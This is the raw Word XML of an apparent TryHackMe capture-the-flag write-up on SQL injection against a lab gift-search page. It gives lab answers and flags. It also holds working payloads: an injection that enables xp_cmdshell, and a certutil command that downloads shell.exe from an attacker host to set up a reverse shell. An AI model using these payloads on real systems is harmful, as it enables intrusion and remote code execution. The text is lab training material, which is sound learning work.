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EEB5" w14:textId="5D36DCB3" w:rsidR="00F81B19" w:rsidRPr="008A24AC" w:rsidRDefault="00EC7A49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A24AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How to test for SQLi?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EE73AE" w14:textId="3AA51DBE" w:rsidR="00EC7A49" w:rsidRDefault="00EC7A49">
      <w:r>
        <w:t>Testing for SQL injection is a critical aspect of web application security assessment. It involves probing the application to identify vulnerabilities where an attacker can manipulate user-supplied input to execute unauthorized SQL queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71130F7A" w14:textId="05DB8695" w:rsidR="005B74CD" w:rsidRDefault="00093B2C">
      <w:r>
        <w:t>Typically,</w:t>
      </w:r>
      <w:r w:rsidR="002A2C7F">
        <w:t xml:space="preserve"> you want to look for URLs with visible parameters or forms.</w:t>
      </w:r>
      <w:r w:rsidR="00D759BD">
        <w:t xml:space="preserve"> A big indicator a website is vulnerable to SQL injection is when you attempt to provide invalid data into the form or parameters and an error is visibly </w:t>
      </w:r>
      <w:r w:rsidR="00342CA0">
        <w:t>displayed</w:t>
      </w:r>
      <w:r w:rsidR="00D759BD">
        <w:t xml:space="preserve"> or nothing happens.</w:t>
      </w:r>
      <w:r w:rsidR="00706D67">
        <w:t xml:space="preserve"> The most common way is to use a single quote.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5070DEA0" w14:textId="54490293" w:rsidR="00093B2C" w:rsidRDefault="00093B2C">
      <w:r w:rsidRPr="00093B2C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="00FA42ED" w:rsidRPr="00F06C71">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.201.119/giftresults.php?age=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00FA42ED">
        <w:t xml:space="preserve">’   </w:t>
      </w:r>
      <w:r w:rsidR="00FA42ED">
        <w:sym w:font="Wingdings" w:char="F0DF"/>
      </w:r>
      <w:r w:rsidR="00FA42ED">
        <w:t xml:space="preserve"> This is the invalid data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435FBA4D" w14:textId="543FA3D9" w:rsidR="005A7C0F" w:rsidRPr="0088385D" w:rsidRDefault="0088385D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251689984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="287DA615" wp14:editId="77593CD5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038095" cy="961905"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20972"/>
                <wp:lineTo x="21480" y="20972"/>
                <wp:lineTo x="21480" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="148272674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26740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62C" w:rsidRPr="0088385D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Error Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D85BB10" w14:textId="77777777" w:rsidR="00FF662C" w:rsidRDefault="00FF662C"/>
    <w:p w14:paraId="6B5A310A" w14:textId="77777777" w:rsidR="005A7C0F" w:rsidRDefault="005A7C0F"/>
    <w:p w14:paraId="05767D6C" w14:textId="77777777" w:rsidR="005A7C0F" w:rsidRDefault="005A7C0F"/>
    <w:p w14:paraId="481E38C9" w14:textId="77777777" w:rsidR="005A7C0F" w:rsidRDefault="005A7C0F"/>
    <w:p w14:paraId="120D9533" w14:textId="77777777" w:rsidR="005A7C0F" w:rsidRDefault="005A7C0F"/>
    <w:p w14:paraId="77A1A5EF" w14:textId="77777777" w:rsidR="005A7C0F" w:rsidRDefault="005A7C0F"/>
    <w:p w14:paraId="3F6FC7A0" w14:textId="3823949D" w:rsidR="00F81B19" w:rsidRPr="008C366E" w:rsidRDefault="00F81B19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C366E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Question 1) Manually navigate the defaced website to find the vulnerable search form. What is the first webpage you come across that contains the gift-finding feature?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01606875" w14:textId="617BDE3A" w:rsidR="00023963" w:rsidRDefault="004923BF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1364D4B2" wp14:editId="68094F41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1437640" cy="256540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19248"/>
                <wp:lineTo x="21180" y="19248"/>
                <wp:lineTo x="21180" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="53334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40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819">
        <w:t>Navigating to the main website (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00532819">
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00532819">
        <w:t>) I see that the webpage has been defaced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F655063" w14:textId="71351330" w:rsidR="00AD402E" w:rsidRDefault="00EE1956">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="35CFD67F" wp14:editId="704CB4A7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2730500" cy="1080135"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21333"/>
                <wp:lineTo x="21399" y="21333"/>
                <wp:lineTo x="21399" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="2053113815" name="Picture 1" descr="A white paper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13815" name="Picture 1" descr="A white paper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B9417" w14:textId="26BB0ED7" w:rsidR="00AD402E" w:rsidRDefault="00AD402E"/>
    <w:p w14:paraId="439FD4D4" w14:textId="4E0FBBB8" w:rsidR="005301EB" w:rsidRDefault="005301EB"/>
    <w:p w14:paraId="5DCFDD9E" w14:textId="1D9EA4FE" w:rsidR="005301EB" w:rsidRDefault="005301EB"/>
    <w:p w14:paraId="668B9144" w14:textId="538DAA01" w:rsidR="005301EB" w:rsidRDefault="005301EB"/>
    <w:p w14:paraId="3306011B" w14:textId="346155C4" w:rsidR="00EE1956" w:rsidRDefault="00ED59A0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="12E2C94F" wp14:editId="236CDC2A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5731510" cy="342265"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20438"/>
                <wp:lineTo x="21538" y="20438"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="56787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70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then looked for the possible search form by scrolling up and down, and then I went to the navigation menu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21550C11" w14:textId="15F85098" w:rsidR="00ED59A0" w:rsidRDefault="003161F0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4855A31D" wp14:editId="284C7757">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>4292600</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>347345</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1413510" cy="1367790"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21359"/>
                <wp:lineTo x="21251" y="21359"/>
                <wp:lineTo x="21251" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="560756412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56412" name="Picture 1" descr="A screenshot of a search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2D0">
        <w:t>Here I found “Gift Search”, which showed a form.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537166D2" w14:textId="77777777" w:rsidR="003161F0" w:rsidRDefault="003161F0"/>
    <w:p w14:paraId="07C511AB" w14:textId="77777777" w:rsidR="00D70F8D" w:rsidRDefault="00D70F8D"/>
    <w:p w14:paraId="090E3A97" w14:textId="3EBF041A" w:rsidR="003161F0" w:rsidRDefault="003161F0"/>
    <w:p w14:paraId="15FD83BB" w14:textId="12F399FE" w:rsidR="003161F0" w:rsidRDefault="00000A8C">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the webpage is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>giftresults.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA8C303" w14:textId="71CFA7B5" w:rsidR="00023963" w:rsidRDefault="00023963" w:rsidP="0052305C">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r w:rsidRPr="008C366E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00023963">
        <w:t>giftsearch.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="57A8DEBE" w14:textId="77777777" w:rsidR="00D70F8D" w:rsidRDefault="00D70F8D" w:rsidP="0052305C">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="013734F7" w14:textId="171C76D2" w:rsidR="00E90880" w:rsidRPr="004129C6" w:rsidRDefault="00580A18">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004129C6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question 2) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004129C6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004129C6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> the SQL error message that is returned. What ODBC Driver is being used in the back end of the website</w:t>
      </w:r>
      <w:r w:rsidR="003C7FB3" w:rsidRPr="004129C6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E437343" w14:textId="3A07021F" w:rsidR="00D70F8D" w:rsidRDefault="00D70F8D" w:rsidP="00D70F8D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6EEBB38C" wp14:editId="16175D2E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>464772</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="278765"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20665"/>
                <wp:lineTo x="21538" y="20665"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="132547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78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When modifying the search form, I discovered that the URL changes without being hidden. This means that the parameters </w:t>
      </w:r>
      <w:r w:rsidRPr="00A03EA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>age</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A03EA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>interests</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00A03EA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>budget</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are used to send to the backend database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6E8355" w14:textId="24B344A1" w:rsidR="0052305C" w:rsidRDefault="005970E0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="10A52130" wp14:editId="0C5C9D8C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>577982</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5523809" cy="304762"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20292"/>
                <wp:lineTo x="21456" y="20292"/>
                <wp:lineTo x="21456" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="139455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59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F8D">
        <w:t>I decided to modify one of the parameter values and it gave me an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D56348A" w14:textId="18FB4815" w:rsidR="00CB7DFF" w:rsidRDefault="00F72DF6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7B090778" wp14:editId="5B5849FB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>348795</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3019425" cy="1647190"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21234"/>
                <wp:lineTo x="21532" y="21234"/>
                <wp:lineTo x="21532" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="11154608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6084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2A5EA" w14:textId="77777777" w:rsidR="00CB7DFF" w:rsidRDefault="00CB7DFF"/>
    <w:p w14:paraId="368F47F6" w14:textId="77777777" w:rsidR="00CB7DFF" w:rsidRDefault="00CB7DFF"/>
    <w:p w14:paraId="4704D6E0" w14:textId="77777777" w:rsidR="00F72DF6" w:rsidRDefault="00F72DF6"/>
    <w:p w14:paraId="154429CC" w14:textId="77777777" w:rsidR="00F72DF6" w:rsidRDefault="00F72DF6"/>
    <w:p w14:paraId="00E2B9AE" w14:textId="77777777" w:rsidR="00F72DF6" w:rsidRDefault="00F72DF6"/>
    <w:p w14:paraId="4145F331" w14:textId="45547AE4" w:rsidR="007B527A" w:rsidRDefault="007B527A">
      <w:r>
        <w:t>This means that it is quite possible that this URL is vulnerable to SQL injection.</w:t>
      </w:r>
      <w:r w:rsidR="00D10696">
        <w:t xml:space="preserve"> The error message should not be displayed if it was program properly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C646FF" w14:textId="39FAA592" w:rsidR="006F3DF6" w:rsidRDefault="006F3DF6" w:rsidP="00FD1CB6">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005301EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00FD1CB6" w:rsidRPr="00FD1CB6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD1CB6" w:rsidRPr="00FD1CB6">
        <w:t>ODBC Driver 12 for SQL Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E45941" w14:textId="4F2560DD" w:rsidR="002C180E" w:rsidRPr="00AF799B" w:rsidRDefault="002C180E" w:rsidP="002C180E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF799B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Question 3) Inject the 1=1 condition into the Gift Search form. What is the last result returned in the database?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EBEBD8" w14:textId="5C736337" w:rsidR="001E6C49" w:rsidRDefault="00A37BCA" w:rsidP="002C180E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251687936" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2ABAE54F" wp14:editId="51B2121E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>260123</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4152381" cy="371429"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19973"/>
                <wp:lineTo x="21504" y="19973"/>
                <wp:lineTo x="21504" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="175762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25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4B2">
        <w:t>In the search form gift result page, I modified the URL to say this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F14DEA4" w14:textId="77777777" w:rsidR="00A37BCA" w:rsidRDefault="00A37BCA" w:rsidP="002C180E"/>
    <w:p w14:paraId="2A703BE9" w14:textId="7D2A57B3" w:rsidR="00A37BCA" w:rsidRDefault="00A37BCA" w:rsidP="002C180E"/>
    <w:p w14:paraId="5080C599" w14:textId="6F222E57" w:rsidR="006504EC" w:rsidRDefault="00FB68AD" w:rsidP="002C180E">
      <w:r>
        <w:t>Scrolling all the way down, you will see the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA83347" w14:textId="51B954D4" w:rsidR="00AF0310" w:rsidRDefault="00AF0310" w:rsidP="00AF0310">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF0310">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>THM{a4ffc901c27fb89efe3c31642ece4447}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6318F95F" w14:textId="77777777" w:rsidR="001E6C49" w:rsidRDefault="001E6C49" w:rsidP="002C180E"/>
    <w:p w14:paraId="6B302A39" w14:textId="05A0FE01" w:rsidR="0079133C" w:rsidRPr="000E7B4B" w:rsidRDefault="0079133C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E7B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question </w:t>
      </w:r>
      <w:r w:rsidR="002C180E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>) What flag is in the note file Fr33dstr left behind on the system?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFA1026" w14:textId="10212F59" w:rsidR="00736778" w:rsidRDefault="00C4775E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6DE31CD5" wp14:editId="6422311D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>224539</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="257175"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20800"/>
                <wp:lineTo x="21538" y="20800"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="133474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41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FF8">
        <w:t>For this I will use a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C424E4" w14:textId="0106D965" w:rsidR="0033589F" w:rsidRDefault="0033589F">
      <w:r>
        <w:t>With MS-SQL there is a way to exploit MS-SQL, if the developer hasn’t removed curtained privileges from the service account a user can run the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790310D9" w14:textId="6D7F8F32" w:rsidR="0033589F" w:rsidRDefault="0033589F" w:rsidP="00C94E2A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0033589F">
        <w:t>10.10.201.119/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0033589F">
        <w:t>giftresults.php?age</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0033589F">
        <w:t xml:space="preserve">='; EXEC </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0033589F">
        <w:t>sp_configure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0033589F">
        <w:t xml:space="preserve"> 'show advanced options', 1; RECONFIGURE; EXEC </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0033589F">
        <w:t>sp_configure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0033589F">
        <w:t xml:space="preserve"> '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0033589F">
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0033589F">
        <w:t>', 1; RECONFIGURE; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD71550" w14:textId="0D9A9ECD" w:rsidR="006A0FAE" w:rsidRDefault="000A6111">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Download the file using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA6CB1">
        <w:t>vulnerability</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D3D3F1" w14:textId="785B18F8" w:rsidR="002A0C75" w:rsidRDefault="002C4CDC">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C4CDC">
        <w:t>http://10.10.201.119/giftresults.php?age=%27;%20EXEC%20xp_cmdshell%20%27Certutil.exe%20-f%20-urlcache%20http://10.8.180.190/shell.exe%20C:\Windows\Temp\shell.exe%27</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C4CDC">
        <w:t>;%20--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4351D16F" w14:textId="6A922CF3" w:rsidR="002A0C75" w:rsidRDefault="002A0C75">
      <w:r>
        <w:t xml:space="preserve">Setup a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> listener</w:t>
      </w:r>
      <w:r w:rsidR="00905295">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B48FF79" w14:textId="578C8C6F" w:rsidR="002A0C75" w:rsidRDefault="002A0C75">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="45F466C6" wp14:editId="4A133FFF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>7800</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1897380" cy="410845"/>
            <wp:effectExtent l="0" t="0" r="7620" b="8255"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21032"/>
                <wp:lineTo x="21470" y="21032"/>
                <wp:lineTo x="21470" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="175545778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57789" name="Picture 1" descr="A close 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4451" cy="41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21B8A" w14:textId="77777777" w:rsidR="002A0C75" w:rsidRDefault="002A0C75" w:rsidP="00F94AB5">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="293C1146" w14:textId="0D42FADA" w:rsidR="002A0C75" w:rsidRDefault="00D762B5" w:rsidP="00F94AB5">
      <w:pPr>
        <w:jc w:val="center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AE4C23D" wp14:editId="5D9E46A0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3372485" cy="702945"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21073"/>
                <wp:lineTo x="21474" y="21073"/>
                <wp:lineTo x="21474" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="5952433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4337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AB5" w:rsidRPr="00F94AB5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
      <w:r w:rsidR="00F94AB5">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00F94AB5" w:rsidRPr="00F94AB5">
        <w:t>10.10.201.119/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F94AB5" w:rsidRPr="00F94AB5">
        <w:t>giftresults.php?age</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
